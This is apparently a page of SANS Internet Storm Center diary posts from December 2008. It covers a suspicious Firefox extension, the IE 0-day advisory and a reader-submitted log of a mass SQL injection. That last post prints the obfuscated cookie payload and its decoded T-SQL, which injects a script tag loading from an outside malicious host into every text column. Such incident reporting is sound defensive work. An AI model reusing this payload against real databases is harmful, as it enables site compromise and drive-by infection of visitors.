Firefox extension used as password stealer?

Published: 2008-12-12
Last Updated: 2008-12-13 00:53:46 UTC
by Johannes Ullrich (Version: 2)
1 comment(s)

Thanks a lot to our reader David who took the time to analyze this in more detail. It appears to be a "harmless" plugin / maybe adware. But no passwords are stolen this time. Thanks!


A reader sent us a suspicious e-mail, which included a link to an .xpi file (a Firefox extension) as attachement. Looks like a very nice find! I am still looking at the extension. Just from a preliminary glanze at it, the extension may try to steal the content of form fields.

The origin appears to be russian. The link went to ht tp : //qs-s.  nm.  ru (again: inserted spaces to protect the innocent)


The e-mail:

We have received mnoey. Here your book. Read and grow rich!
ht tp:// qs-s. nm. ru - We have received money. Here your book. Read adn grow rich!

(and thanks for the person posting the comment below to point out I forgot to break up the second instance of the URL :-) ).

 Still working on exactly figuring out what this does. E.g. if it is just adware or actually steels passwords. May have to wait until I get home and get to run it in the lab.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


1 comment(s)

Browser Security Handbook

Published: 2008-12-12
Last Updated: 2008-12-12 20:16:07 UTC
by Swa Frantzen (Version: 1)
0 comment(s)

I've been having a lot of fun and quite some additional insight into what makes one browser different from the next one reading today the Google browser security handbook by Michal Zalewski

I've not yet touched on the testing toolkit they have available for download, but the 3 sections of the document are quite interesting.

Highly recommended reading!

Swa Frantzen -- Section 66

0 comment(s)

Internet Storm Center Podcast Episode Twelve

Published: 2008-12-12
Last Updated: 2008-12-12 15:40:41 UTC
by Joel Esler (Version: 1)
0 comment(s)

Hey everyone, sorry it has taken so long to get around to recording another podcast episode.  Travel schedules have been very crazy between us lately.  Anyway, enough excuses, here is episode twelve. 

All the podcasts

Just this podcast

Podcast through iTunes

-- Joel Esler

Keywords: podcast
0 comment(s)

IE7 0day expanded to include IE6 and IE8(beta) -- now others

Published: 2008-12-12
Last Updated: 2008-12-12 12:37:57 UTC
by Kevin Liston (Version: 2)
1 comment(s)

Microsoft has updated Security Advisory (961051) to include Microsoft Internet Explorer 6 and Windows Internet Explorer 8(beta).

This is the vulnerability discussed is these recent articles:


I don't want to start a panic.  We have not received any reports of attacks affecting these versions (yet.)


The advisory has been updated again to say:

Our investigation so far has shown that these attacks are only against Windows Internet Explorer 7 on supported editions of Windows XP Service Pack 2, Windows XP Service Pack 3, Windows Server 2003 Service Pack 1, Windows Server 2003 Service Pack 2, Windows Vista, Windows Vista Service Pack 1, and Windows Server 2008. Microsoft Internet Explorer 5.01 Service Pack 4, Microsoft Internet Explorer 6 Service Pack 1, Microsoft Internet Explorer 6, and Windows Internet Explorer 8 Beta 2 on all supported versions of Microsoft Windows are potentially vulnerable.

Emphasis is mine.

What is confirmed to be vulnerable:

  • Internet Explorer 7

What is potentially vulnerable:

  • Internet Explorer 5.01 SP4
  • Internet Explorer 6
  • Internet Explorer 6 SP1
  • Internet Explorer 8 Beta 2



Keywords: 0day ie
1 comment(s)

MSIE 0-day Spreading Via SQL Injection

Published: 2008-12-12
Last Updated: 2008-12-12 01:00:18 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

One of our readers submitted this log entry, which shows a typical SQL injection exploit. The "new" part is that the javascript injected in this case is trying to exploit the MSIE 0-day:

In this case, the SQL injection is delivered as a cookie, not a GET parameter.

I broke up the strings for readability and inserted spaces around the malicious URL. As usual with these kinds of exploit, the script will load another script which will load another script ultimatley leading to the IE exploit.


Cookie: ref=ef';DECLA RE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263

F43415445205461626C655F437572736F72 AS VARCHAR(4000));exec (@S);--

Decoded as:
DECLARE @T varchar(255),@C varchar(255)
  select, from sysobjects a,syscolumns b
  where and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
                      b.xtype=231 or b.xtype=167)

OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+']
   set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
       ''<script src=http:// 17gamo . com/1.js></script>''')
CLOSE Table_Cursor DEALLOCATE Table_Cursor


Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 comment(s)


Diary Archives